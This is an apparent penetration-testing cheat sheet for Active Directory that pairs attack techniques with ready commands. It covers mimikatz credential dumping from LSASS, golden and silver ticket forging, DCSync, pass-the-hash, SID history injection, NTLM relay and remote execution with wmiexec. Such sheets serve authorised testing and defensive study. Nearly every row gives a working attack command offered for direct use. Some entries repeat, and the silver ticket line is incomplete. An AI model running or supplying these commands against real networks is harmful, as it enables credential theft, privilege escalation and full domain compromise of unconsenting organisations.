Enumeration |
Gathering information about the Active Directory environment, including users, groups, and computers. |
ldapsearch -x -h <DC_IP> -b "dc=example,dc=com" |
Kerberos Attacks |
Exploiting the Kerberos authentication protocol, including techniques like Kerberoasting and Pass-the-Ticket. |
Invoke-Kerberoast (PowerShell script) |
LDAP Enumeration |
Using LDAP to enumerate users, groups, and other objects in the directory. |
ldapsearch -x -h <DC_IP> -b "dc=example,dc=com" |
Password Dumping |
Extracting password hashes from memory, registry, or database files. |
secretsdump.py <domain>/<user>@<dc_ip> |
Pass-the-Hash |
Using an extracted hash to authenticate as a user without needing their plaintext password. |
pth-winexe -U <domain>/<user>%<hash> //<target_ip> cmd |
Pass-the-Ticket |
Using a stolen Kerberos ticket to authenticate as a user. |
Invoke-Mimikatz -Command '"kerberos::ptt <ticket>"' |
Silver Ticket Attack |
Forging Kerberos TGS tickets to gain access to specific services. |
Invoke-Mimikatz -Command '"kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<server> /rc4:<key>"' |
Golden Ticket Attack |
Forging Kerberos TGT tickets to gain control of the entire domain. |
Invoke-Mimikatz -Command '"kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<hash>"' |
DCSync Attack |
Mimicking the behavior of a Domain Controller to extract credentials from the AD database. |
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<user>"' |
BloodHound |
Using the BloodHound tool to analyze AD relationships and identify attack paths. |
Invoke-BloodHound -CollectionMethod All |
Abusing Trust Relationships |
Exploiting trust relationships between domains to escalate privileges or move laterally. |
nltest /domain_trusts |
GPO Abuse |
Exploiting or modifying Group Policy Objects to gain elevated privileges or persistence. |
gpresult /r to review applied policies. |
Domain Trust Exploitation |
Abusing trust relationships between domains to compromise additional domains. |
nltest /domain_trusts |
Credential Theft |
Stealing credentials from memory, SAM, or LSASS. |
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" |
SID History Injection |
Adding a SID to an account's SID history to escalate privileges. |
Invoke-Mimikatz -Command '"sid::add /user:<user> /domain:<domain> /sid:<sid>"' |
NTLM Relay Attack |
Relaying NTLM authentication to execute code on another machine. |
ntlmrelayx.py -t smb://<target_ip> |
Lateral Movement |
Moving from one compromised machine to others within the network. |
wmiexec.py <domain>/<user>@<target_ip> |
|
|
|